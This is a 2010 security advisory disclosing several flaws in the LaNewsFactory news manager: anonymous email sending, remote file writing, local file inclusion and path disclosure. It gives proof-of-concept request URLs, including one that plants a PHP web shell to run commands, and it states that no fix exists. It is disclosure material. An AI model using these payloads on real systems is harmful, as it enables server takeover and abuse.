LaNewsFactory Multiple Remote Vulnerabilities
http://www.salvatorefresta.net/files/adv/LaNewsFactory%20Multiple%20Remote%20Vulnerabilities-19042010.txt
 Name              LaNewsFactory
 Vendor            Christophe Brocas
 Versions Affected <= 1.0.0
 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-04-19
X. INDEX
 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
 VI.   DISCLOSURE TIMELINE
 
I. ABOUT THE APPLICATION
This  is  a  very used  news manager that  not require a
database.
II. DESCRIPTION
This news managment is affected  by many  vulnerabilities
that  allows  a  guest  to  write  arbitrary files on the
system, include local files, read local files etc..
III. ANALYSIS
Summary:
 A) Anonymous email
 B) Remote File Writing
 C) Multiple Local File Inclusion
 D) Full Path Disclosure
A) Anonymous email
The mailto.php file allows a guest to send arbitrary emails.
The input is not properly sanitised:
if (ValidEmailAdress($youremail) and ValidEmailAdress($friendemail))
{
	mail ($friendemail, $display[$lang]["mailtoafriend"],"$comments\n\n".$url."print".$LNF_file_extension."?art=$newsfilename\n\n$yourname", "From: $youremail");
B) Remote File Writing
The save-edited-news.php  file  allows a guest to write a
file  on the  system.  This  vulnerability may be used to
execute remote commands on the system.
C) Multiple Local File Inclusion
There are many files that use a not sanitised input with
include PHP function. This  vulnerability  may be used to
execute remote commands by including the Apache Log file.
D) Full Path Disclosure
For  example,   print.php  file  prints  many  errors  by
including the full path of the file.  This  path  may  be
very useful for local file inclusion and other.
IV. SAMPLE CODE
A) Anonymous email
	mailto.php?friendemail=target@email.com&youremail=ano@email.com&comments=suck!
	
	
B) Remote File Writing to Remote Command Execution
	save-edited-news.php?art=news/file.php&corps=<?php system($_GET[cmd]); ?>
	
	
D) Full Path Disclosure
	print.php?art=-1.xml
V. FIX
No fix.
VIII. DISCLOSURE TIMELINE
2010-04-19 Bugs discovered
2010-04-19 Advisory released